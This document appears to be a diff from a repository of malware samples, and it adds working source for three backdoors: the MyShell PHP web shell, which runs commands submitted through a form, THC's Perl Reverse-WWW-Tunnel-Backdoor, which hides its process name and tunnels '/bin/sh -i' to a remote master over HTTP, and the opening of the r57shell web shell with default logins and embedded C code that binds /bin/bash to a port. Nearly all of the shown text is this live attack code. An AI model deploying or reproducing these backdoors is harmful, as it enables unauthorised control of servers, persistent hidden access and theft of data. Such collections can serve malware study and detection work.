$work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
if ($work_dir == "") $work_dir = "/";
}
elseif (substr($path,0,1)=="/")$work_dir=$path;
else $work_dir=$work_dir."/".$path;
$work_dir = validate_dir($work_dir);
@chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
$work_dir = exec("pwd");
$commandBk = $command;
$command = "";
break;
case "man":
exec($command,$man);
if($man){
$codes = ".".chr(8);
$manual = implode("\n",$man);
$shellOutput = ereg_replace($codes,"",$manual);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case "cat":
exec($command,$cat);
if($cat){
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case "more":
exec($command,$cat);
if($cat){
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case $TexEd:
if(file_exists($input[1])){
exec("cat ".$input[1],$cat);
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$fileOwner = posix_getpwuid(fileowner($input[1]));
$filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
$fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>";
}
else $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;<font color=$linkColor>NEW FILE</font>";
$currFile = $input[1];
$editMode = true;
$command = "";
break;
case "void":
$shellOutput = "MyShell: $voidCmd: void command for MyShell";
$commandBk = $command;
$command = "";
}
//Now we prepare the webpage
if(!$oCols)$oCols=$termCols;
if(!$oRows)$oRows=$termRows;
if($editMode)$focus="shellOut.focus()";
else $focus="command.select()";
//WhoamI
if(!$whoami)$whoami=exec("whoami");
?>
<html>
<head>
<title><?echo $MyShellVersion?></title>
<style>
body{
background-color: <?echo $bgColor ?>;
font-family : sans-serif;
font-size : 10px;
scrollbar-face-color: #666666;
scrollbar-shadow-color: <?echo $bgColor ?>;
scrollbar-highlight-color: #999999;
scrollbar-3dlight-color: <?echo $bgColor ?>;
scrollbar-darkshadow-color: <?echo $bgColor ?>;
scrollbar-track-color: <?echo $bgInputColor ?>;
scrollbar-arrow-color: <?echo $textColor ?>;
}
input,select,option{
background-color: <?echo $bgInputColor ?>;
color : <?echo $outColor ?>;
border-style : none;
font-size : 10px;
}
textarea{
background-color: <?echo $bgColor ?>;
color : <?echo $outColor ?>;
border-style : none;
}
</style>
</head>
<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
<form name="shell" method="post">
Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a>
<input type="hidden" name=whoami value=<?echo $whoami?>>
&nbsp;&nbsp;:::::::&nbsp;&nbsp;
<?
if($editMode){
echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
}
else{
echo "Current working directory: <b>\n";
$work_dir_splitted = explode("/", substr($work_dir, 1));
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
if ($work_dir_splitted[0] == "") {
$work_dir = "/"; /* Root directory. */
}
else{
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$url .= "/".$work_dir_splitted[$i];
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>";
}
}
}
?>
<br>
<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
<?
echo $shellOutput;
if ($command) {
if ($stderr) {
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
}
else {
$ok = system($command,$status);
if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
}
}
if ($commandBk) $command = $commandBk;
?>
</textarea>
<br>
<?
if($editMode) echo"
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
<input type='submit' name='editSave' value=' Save '>&nbsp;&nbsp;&nbsp;
<input type='submit' name='editSaveExit' value=' Save and Exit '>&nbsp;&nbsp;&nbsp;
<input type='reset' value=' Restore original '>&nbsp;&nbsp;&nbsp;
<input type='submit' name='editCancel' value=' Cancel/Exit '>&nbsp;&nbsp;&nbsp;
<input type='hidden' name='editMode' value='true'>
<br>";
?>
<br>
Command:
<input type="text" name="command" size="80"
<? if ($command && $echoCommand) {
echo "value=`$command`";
}
?> > <input name="submit_btn" type="submit" value="Go!">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<?
if ($autoErrorTrap) echo "Auto error traping enabled";
else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
if($editMode){
echo "<input type='hidden' name='work_dir' value='$work_dir'>
<br>Save file as: <input type='text' name='file' value='$currFile'>";
}
else{
echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
// List of directories.
$dir_handle = opendir($work_dir);
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == ".")
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
elseif ($dir == "..") {
// Parent Dir. This might be server's root directory
if (strlen($work_dir) == 1) {
// work_dir is only 1 charecter - it can only be / so don't output anything
}
elseif (strrpos($work_dir, "/") == 0) { // we have a top-level directory eg. /bin or /home etc...
echo "<option value=\"/\">Parent Directory</option>\n";
}
else { // String-manipulation to find the parent directory... Trust me - it works :-)
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
}
else {
if ($work_dir == "/")
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
else
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
closedir($dir_handle);
echo "</select>";
}
?>
&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a>
</form>
</body>
</html>

368
PHP/Backdoor.PHP.ReverseTunnel.20 Normal file
View File

@ -0,0 +1,368 @@
#!/usr/bin/perl
#
# Reverse-WWW-Tunnel-Backdoor v2.0
# (c) 1998-2002 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
# Check out http://www.thehackerschoice.com
# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
# available at the website above in the "Articles" section.
#
# Greets to all THC, TESO, ADM and #bluebox guys
# verified to work on Linux, Solaris, AIX and OpenBSD
# BUGS: some Solaris machines: select(3) is broken, won't work there
# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
# we can't make proper receive checks here. Workaround implemented.
#
# HISTORY:
# v2.0: HTTP 1.0 protocol compliance (finally ;-)
# v1.6: included www-proxy authentication ;-))
# v1.4: porting to various unix types (and I thought perl'd be portable...)
# v1.3: initial public release of the paper including this tool
#
# GENERAL CONFIG (except for $MASK, everything must be the same
# for MASTER and SLAVE is this section!)
#
$MODE="POST"; # GET or POST
$CGI_PREFIX="/cgi-bin/orderform";# should look like a valid cgi.
$MASK="vi"; # for masking the program's process name
$PASSWORD="THC"; # anything, nothing you have to rememeber
# (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!)
#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
$DELAY="3"; # time to wait for output after your command(s)
#$TIME="14:39"; # time when to connect to the master (unset if now)
#$DAILY="yes"; # tries to connect once daily if set with something
#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one
#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one
#$PROXY_USER="user"; # username for proxy authentication
#$PROXY_PASSWORD="pass";# password for proxy authentication
#$DEBUG="yes"; # for debugging purpose, turn off when in production
$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris
# END OF CONFIG # nothing for you to do after this point #
################## BEGIN MAIN CODE ##################
require 5.002;
use Socket;
$|=1; # next line changes our process name
if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
undef $DAILY if (! $TIME);
if ( !($PROXY) || !($PROXY_PORT) ) {
undef $PROXY;
undef $PROXY_PORT;
}
$protocol = getprotobyname('tcp');
if ($ARGV[0] ne "slave" && $ARGV[0] ne "daemon" && $ARGV[0] ne "master" && $ARGV[1] eq "") {
print STDOUT "Proof-of-Concept Program for the paper \"Placing Backdoors through Firewalls\"\navailable at http://www.thehackerschoice.com in the \"Articles\" section.\n";
print STDOUT "Commandline options for rwwwshell:\n\tmaster\t- master mode\n\tslave\t- slave mode\n";
exit(0);
}
if ($ARGV[0] eq "slave") {
print STDOUT "starting in slave mode\n";
$SLAVE_MODE = "yeah";
}
# check for a correct mode
if ($MODE ne "GET" && $MODE ne "POST") {
print STDOUT "Error: MODE must either be GET or POST, re-edit this perl config\n";
exit(-1);
}
if (! $SLAVE_MODE) {
&master;
} else {
&slave;
}
# END OF MAIN FUNCTION
############### SLAVE FUNCTION ###############
sub slave {
$pid = 0;
$PROXY_SUFFIX = "Host: " . $SERVER . "\r\nUser-Agent: Mozilla/4.0\r\nAccept: text/html, text/plain, image/jpeg, image/*;\r\nAccept-Language: en\r\n";
if ($PROXY) { # setting the real config (for Proxy Support)
$REAL_SERVER = $PROXY;
$REAL_PORT = $PROXY_PORT;
$REAL_PREFIX = $MODE . " http://" . $SERVER . ":" . $LISTEN_PORT
. $CGI_PREFIX;
$PROXY_SUFFIX = $PROXY_SUFFIX . "Pragma: no-cache\r\n";
if ( $PROXY_USER && USER_PASSWORD ) {
&base64encoding;
$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
}
} else {
$REAL_SERVER = $SERVER;
$REAL_PORT = $LISTEN_PORT;
$REAL_PREFIX = $MODE . " " . $CGI_PREFIX;
}
$REAL_PREFIX = $REAL_PREFIX . "?" if ($MODE eq "GET");
$REAL_PREFIX = $REAL_PREFIX . " HTTP/1.0\r\n" if ($MODE eq "POST");
AGAIN: if ($pid) { kill 9, $pid; }
if ($TIME) { # wait until the specified $TIME
$TIME =~ s/^0//; $TIME =~ s/:0/:/;
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" . $min;
while ($TIME ne $t) {
sleep(28); # every 28 seconds we look at the watch
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" .$min;
}
}
print STDERR "Slave activated\n" if $DEBUG;
if ($DAILY) { # if we must connect daily, we'll
if (fork) { # fork the daily shell process to
sleep(69); # ensure the master control process
goto AGAIN; # won't get stuck by a fucking cmd
} # the user executed.
print STDERR "forked\n" if $DEBUG;
}
$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
$remote = sockaddr_in($REAL_PORT, $address);
$forked = 0;
GO: close(THC);
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
if (! $forked) { # fork failed? fuck, let's try again
pipe R_IN, W_IN; select W_IN; $|=1;
pipe R_OUT, W_OUT; select W_OUT; $|=1;
$pid = fork;
if (! defined $pid) {
close THC;
close R_IN; close W_IN;
close R_OUT; close W_OUT;
goto GO;
}
$forked = 1;
}
if (! $pid) { # this is the child process (execs $SHELL)
close R_OUT; close W_IN; close THC;
print STDERR "forking $SHELL in child\n" if $DEBUG;
open STDIN, "<&R_IN";
open STDOUT, ">&W_OUT";
open STDERR, ">&W_OUT";
exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
close R_IN; close W_OUT;
exit(0);
} else { # this is the parent (data control + network)
close R_IN;
sleep($DELAY); # we wait $DELAY for the commands to complete
vec($rs, fileno(R_OUT), 1) = 1;
print STDERR "before: allwritten2stdin\n" if $DEBUG;
select($r = $rs, undef, undef, 30);
print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
sleep(1); # The following readin of the command output
$output = ""; # looks weird. It must be! every system
vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-((
print STDERR "before: readwhiledatafromstdout\n" if $DEBUG;
while (select($w = $ws, undef, undef, 1)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : readwhiledatafromstdout\n" if $DEBUG;
print STDERR "before: fucksunprob\n" if $DEBUG;
vec($ws, fileno(W_OUT), 1) = 1;
while (! select(undef, $w=$ws, undef, 0.001)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : fucksunprob\n" if $DEBUG;
print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG;
print W_OUT "\000" || goto END_IT;
print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
while (1) {
read R_OUT, $readout, 1 || last;
last if ($readout eq "\000");
$output = $output . $readout;
}
print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
&uuencode; # does the encoding of the shell output
if ($MODE eq "GET") {
$encoded = $REAL_PREFIX . $encoded . " HTTP/1.0\r\n";
$encoded = $encoded . $PROXY_SUFFIX;
$encoded = $encoded . "\r\n";
} else { # $MODE is "POST"
$encoded = $REAL_PREFIX . $PROXY_SUFFIX
. "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
. $encoded . "\r\n";
}
print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
connect(THC, $remote) || goto END_IT; # connect to master
print STDERR "send encoded data, fail->exit\n" if $DEBUG;
send (THC, $encoded, 0) || goto END_IT; # and send data
$input = "";
vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
print STDERR "before: wait4answerfromremote\n" if $DEBUG;
while (! select($r = $rt, undef, undef, 0.00001)) {}
print STDERR "after : wait4answerfromremote\n" if $DEBUG;
print STDERR "read data from socket until eod\n" if $DEBUG;
$error="no";
# while (1) { # read until EOD (End Of Data)
print STDERR "?" if $DEBUG;
# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
recv (THC, $readin, 16386, 0) || undef $error;
# if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
print STDERR "!" if $DEBUG;
goto OK if (($readin eq "\000") or ($readin eq "\n")
or ($readin eq ""));
$input = $input . $readin;
# }
OK: print STDERR "\nall data read, entering OK\n" if $DEBUG;
print STDERR "RECEIVE: $input\n" if $DEBUG;
$input =~ s/.*\r\n\r\n//s;
print STDERR "BEFORE DECODING: $input\n" if $DEBUG;
&uudecode; # decoding the data from the master
print STDERR "AFTER DECODING: $decoded\n" if $DEBUG;
print STDERR "if password not found -> exit\n" if $DEBUG;
goto END_IT if ($decoded =~ m/^$PASSWORD/s == 0);
$decoded =~ s/^$PASSWORD//;
print STDERR "writing input data to $SHELL\n" if $DEBUG;
print W_IN "$decoded" || goto END_IT; # sending the data
sleep(1); # to the shell proc.
print STDERR "jumping to GO\n" if $DEBUG;
goto GO;
}
END_IT: kill 9, $pid; $pid = 0;
exit(0);
} # END OF SLAVE FUNCTION
############### MASTER FUNCTION ###############
sub master {
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
listen(THC, 3) || die "can't listen\n"; # print the HELP
print STDOUT '
Welcome to the Reverse-WWW-Tunnel-Backdoor v2.0 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it\'s output and then
type in your commands to execute on SLAVE. You\'ll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn\'t try to view binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don\'t like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.
';
YOP: print STDOUT "\nWaiting for connect ...";
$remote=accept (S, THC) || goto YOP; # get the connection
($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
$slave=gethostbyaddr($r_slave, AF_INET); # data.
$slave="unresolved" if ($slave eq "");
print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
select S; $|=1;
select STDOUT; $|=1;
$input = "";
vec($socks, fileno(S), 1) = 1;
$error="no";
# while (1) { # read the data sent by the slave
while (! select($r = $socks, undef, undef, 0.00001)) {}
recv (S, $readin, 16386, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) {
print STDOUT "[disconnected]\n";
}
# $readin =~ s/\r//g;
# $input = $input . $readin;
# last if ( $input =~ m/\r\n\r\n/s );
$input = $readin;
print STDERR "MASTER RECEIVE: $input\n" if $DEBUG;
# }
&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
if ( $input =~ m/^GET /s ) {
$input =~ s/^.*($CGI_PREFIX)\??//s;
$input =~ s/\r\n.*$//s;
} else { if ( $input =~ m/^POST /s ) {
$input =~ s/^.*\r\n\r\n//s;
} else { if ( $input =~ m/^HEAD /s ) {
&hide_as_broken_webserver;
} else {
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} } }
print STDERR "BEFORE DECODING: $input\n" if $DEBUG;
&uudecode; # decoding the data from the slave
&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
$decoded =~ s/^$PASSWORD//s;
$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
print STDOUT "$decoded"; # showing the slave output to the user
$output = <STDIN>; # and get his input.
&uuencode; # encode the data for the slave
$encoded = "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain\r\n\r\n" . $encoded . "\r\n";
send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
close (S);
print STDOUT "sent.\n";
goto YOP; # wait for the next connect from the slave
} # END OF MASTER FUNCTION
###################### MISC. FUNCTIONS #####################
sub uuencode { # does the encoding stuff for error-free data transfer via WWW
$output = $PASSWORD . $output; # PW is for error checking and
$uuencoded = pack "u", "$output"; # preventing sysadmins from
$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
/'zcadefghjklmnopqrstuv' # data. No real
/; # security!
$uuencoded =~ tr/"'"/'b'/;
if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
$cut_length = 4099 - (length $REAL_PREFIX);
$uuencoded = pack "a$cut_length", $uuencoded
if ($codelength > 4111);
}
$encoded = $uuencoded;
} # END OF UUENCODE FUNCTION
sub uudecode { # does the decoding of the data stream
$input =~ tr/'zcadefghjklmnopqrstuv'
/'\n)=(:;&><,#$*%]!\@"`\\\-'
/;
$input =~ tr/'b'/"'"/;
$decoded = unpack "u", "$input";
} # END OF UUDECODE FUNCTION
sub base64encoding { # does the base64 encoding for proxy passwords
$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
$encoded_string = substr(pack('u', $encode_string), 1);
chomp($encoded_string);
$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
$padding = (3 - length($encode_string) % 3) % 3;
$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
} # END OF BASE64ENCODING FUNCTION
sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\r\n<TITLE>404 File Not Found</TITLE>\r\n</HEAD>".
"<BODY>\r\n<H1>File Not Found</H1>\r\n</BODY></HTML>\r\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
# END OF PROGRAM # (c) 1998-2002 by <vh@reptile.rug.ac.be>


1917
PHP/Backdoor.PHP.Rst.ai Normal file
View File

File diff suppressed because it is too large Load Diff

7
PHP/Backdoor.PHP.Rst.ak Normal file
View File

File diff suppressed because one or more lines are too long

2115
PHP/Backdoor.PHP.Rst.al Normal file
View File

File diff suppressed because it is too large Load Diff

429
PHP/Backdoor.PHP.Rst.am Normal file
View File

@ -0,0 +1,429 @@
<?
/******************************************************************************************************/
/*
/* __________ ___ ___
/* \______ \__ __ ______/ | \
/* | _/ | \/ ___/ _ \
/* | | \ | /\___ \\ /
/* |____|_ /____//____ >\___|_ /
/* -======\/==security=\/=team==\/
/*
/* SPECIAL xbIx birthday edition
/*
/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru èëè www.rsteam.ru
/* Âåðñèÿ 1.0 beta (ïèñàëàñü ïðàêòè÷åñêè íà êîëåíêå... òàê ÷òî êîä ñûðîâàò... äëÿ òåñòèðîâàíèÿ)
/*
/* Âîçìîæíîñòè:
/* ~ çàùèòà ñêðèïòà ñ ïîìîùüþ ïàðîëÿ
/* ~ âûïîëíåíèå øåëë-êîìàíä
/* ~ çàãðóçêà ôàéëîâ íà ñåðâåð
/* ~ ïîääåðæèâàåò àëèàñû êîìàíä
/* ~ âêëþ÷åíû 4 àëèàñà êîìàíä:
/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì
/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì
/* - ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php
/* - ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ
/* ~ äâà ÿçûêà èíòåðôåéñà: ðóññêèé, àíãëèéñêèé
/* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò
/*
/* 05.03.2004 (c) RusH security team
/*
/******************************************************************************************************/
## Àóòåíòèôèêàöèÿ
## Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
## ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
$name="r57"; ## ëîãèí ïîëüçîâàòåëÿ
$pass="r57"; ## ïàðîëü ïîëüçîâàòåëÿ
if(!isset($PHP_AUTH_USER))
{
Header('WWW-Authenticate: Basic realm="r57shell"');
Header('HTTP/1.0 401 Unauthorized');
exit;
}
else
{
if(($PHP_AUTH_USER != $name ) || ($PHP_AUTH_PW != $pass))
{
Header('WWW-Authenticate: Basic realm="r57shell"');
Header('HTTP/1.0 401 Unauthorized');
exit;
}
}
error_reporting(0);
set_time_limit(0);
/*
Âûáîð ÿçûêà
$language='ru' - ðóññêèé
$language='eng' - àíãëèéñêèé
*/
$language='ru';
$lang=array(
'ru_text1' => 'Âûïîëíåííàÿ êîìàíäà',
'ru_text2' => 'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
'ru_text3' => 'Âûïîëíèòü êîìàíäó',
'ru_text4' => 'Ðàáî÷àÿ äèðåêòîðèÿ',
'ru_text5' => 'Çàãðóçêà ôàéëîâ íà ñåðâåð',
'ru_text6' => 'Ëîêàëüíûé ôàéë',
'ru_text7' => 'Àëèàñû',
'ru_text8' => 'Âûáåðèòå àëèàñ',
'ru_butt1' => 'Âûïîëíèòü',
'ru_butt2' => 'Çàãðóçèòü',
'ru_text9' => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
'ru_text10' => 'Îòêðûòü ïîðò',
'ru_text11' => 'Ïàðîëü äëÿ äîñòóïà',
'ru_butt3' => 'Îòêðûòü',
'eng_text1' => 'Executed command',
'eng_text2' => 'Execute command on server',
'eng_text3' => '&nbsp;Run command',
'eng_text4' => 'Work directory',
'eng_text5' => 'Upload files on server',
'eng_text6' => 'Local file',
'eng_text7' => 'Aliases',
'eng_text8' => 'Select alias',
'eng_butt1' => 'Execute',
'eng_butt2' => 'Upload',
'eng_text9' => 'Bind port to /bin/bash',
'eng_text10' => 'Port',
'eng_text11' => 'Password for access',
'eng_butt3' => 'Bind'
);
/*
Àëèàñû êîìàíä
Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
*/
$aliases=array(
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
'find all suid files' => 'find / -type f -perm -04000 -ls',
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
'find all sgid files' => 'find / -type f -perm -02000 -ls',
/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
'find config.inc.php files' => 'find / -type f -name config.inc.php',
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
'find writable directories and files' => 'find / -perm -2 -ls',
'----------------------------------------------------------------------------------------------------' => 'ls -la'
);
/* Port bind source */
$port_bind_bd_c="
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(argc < 3) usage(argv[0]);
if(fork() == 0) { // Îòâåòâëÿåì íîâûé ïðîöåññ
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror(\"socket error\");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
while(1)
{
newfd=accept(sockfd,0,0);
dup2(newfd,0);
dup2(newfd,1);
dup2(newfd,2);
write(newfd,\"Password:\",10);
read(newfd,buf,sizeof(buf));
if (!chpass(argv[2],buf))
system(\"echo welcome to r57 shell && /bin/bash -i\");
else
fprintf(stderr,\"Sorry\");
close(newfd);
}
}
}
int usage(char *progname)
{
fprintf(stderr,\"USAGE:%s <port num> <password>\n\",progname);
exit(0);
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}";
?>
<!-- Çäðàâñòâóé Âàñÿ -->
<html>
<head>
<title>r57shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
table {
BORDER-RIGHT: #eeeeee 2px outset;
BORDER-TOP: #eeeeee 2px outset;
BORDER-LEFT: #eeeeee 2px outset;
BORDER-BOTTOM: #eeeeee 2px outset;
BACKGROUND-COLOR: #D4D0C8;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
</head>
<body bgcolor="#e4e0d8">
<table width=100%cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc>
<!-- logo -->
<font face=Verdana size=2>&nbsp;&nbsp;
<font face=Webdings size=6><b>!</b></font><b>&nbsp;&nbsp;r57shell</b>
</font>
</td></tr><table>
